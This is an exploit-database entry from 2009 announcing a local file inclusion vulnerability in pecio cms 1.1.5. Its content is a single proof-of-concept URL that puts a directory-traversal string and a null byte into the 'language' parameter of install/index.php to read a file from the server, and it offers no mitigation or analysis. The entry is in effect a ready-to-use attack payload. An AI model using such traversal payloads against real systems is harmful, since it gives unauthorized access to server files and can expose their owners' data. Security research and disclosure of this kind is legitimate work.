id: 5126
date: 04/30/2009
title: pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability
author: SirGod
cves: 

=======================================================================
pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability
=======================================================================


#######################################################################################################
[+] pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
#######################################################################################################

[+] Local File Inclusion

   PoC :

     http://127.0.0.1/[path]/install/index.php?step=2&language=../../../../../../../BOOTSECT.BAK%00

########################################################################################################




#  0day.today [2023-03-24]  #